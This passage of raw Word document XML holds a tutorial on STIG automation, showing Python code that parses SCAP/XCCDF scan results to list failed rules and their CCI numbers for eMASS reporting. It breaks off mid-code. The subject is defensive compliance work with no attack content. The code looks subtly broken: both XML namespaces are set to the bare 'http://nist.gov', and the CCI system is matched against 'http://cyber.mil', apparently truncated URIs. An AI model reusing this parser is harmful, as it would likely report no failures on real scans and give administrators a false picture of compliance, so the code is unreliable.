        </w:rPr>
        <w:t>STIG Automation: Technical Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E55A0" w14:textId="568C2575" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1. Parsing SCAP Scan Results to Extrapolate CCI</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7177C49F" w14:textId="5985F090" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When you run a Security Content Automation Protocol (SCAP) scan, it outputs an XML file containing the raw results. To make this actionable, you can use Python to parse the scan data, isolate non-compliant rules (fail), and extract the precise </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CCI number</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to map your compliance status back to eMASS.</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED18B1E" w14:textId="06E2AD9E" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Using Python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C8077F" w14:textId="77777777" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E0BEA2" w14:textId="412B4377" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> xml.etree.ElementTree </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ET</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extract_failed_ccis</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(scap_results_xml):</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Parses an XCCDF/SCAP results XML file to identify failed STIG checks </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    and extract their corresponding NIST-mapped CCIs.</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Define standard XCCDF and Test Result namespaces</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    namespaces = {</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'xccdf'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'http://nist.gov'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'cdf'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'http://nist.gov'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    tree = ET.parse(scap_results_xml)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    root = tree.getroot()</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    print(</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"=== CRITICAL CORA REMEDIATION TARGETS ==="</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Locate all rule-result blocks in the SCAP output</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rule_result </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> root.findall(</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'.//xccdf:rule-result'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, namespaces):</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        result_status = rule_result.find(</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'xccdf:result'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, namespaces).text</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Isolate 'fail' statuses to find critical vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> result_status == </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'fail'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            rule_id = rule_result.get(</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'idref'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Extract CCIs linked to the failed rule</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            ccis = []</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ident </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rule_result.findall(</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'.//xccdf:ident'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, namespaces):</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ident.get(</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'system'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) == </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'http://cyber.mil'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
